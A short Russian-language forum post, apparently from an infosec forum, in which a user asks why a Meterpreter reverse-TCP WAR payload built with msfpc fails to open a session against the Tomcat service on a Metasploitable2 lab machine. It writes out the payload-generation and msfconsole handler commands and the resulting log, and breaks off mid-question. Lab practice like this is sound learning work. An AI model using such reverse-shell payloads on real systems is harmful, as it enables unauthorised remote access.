Ковыряю древнюю машину Metasploitable2, а именно tomcat
Делаю нагрузку такой командой:
sudo msfpc Tomcat 192.168.146.148 4444 MSF REVERSE TCP

Получаю два файла.
В кали запускаю: sudo msfconsole -q -r ‘/home/kali/tomcat-meterpreter-staged-reverse-tcp-4444-war.rc
на жертве запускаю нагрузку.
Кали пишет:
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.146.148:4444

Если на жертве пишу: nc -vz…

Подробнее

​Форум информационной безопасности — Codeby.net

Read More

Ваша реакция?
+1
0
+1
0
+1
0
+1
0
+1
0
+1
0
+1
0
0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

0 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии
0
Оставьте комментарий! Напишите, что думаете по поводу статьи.x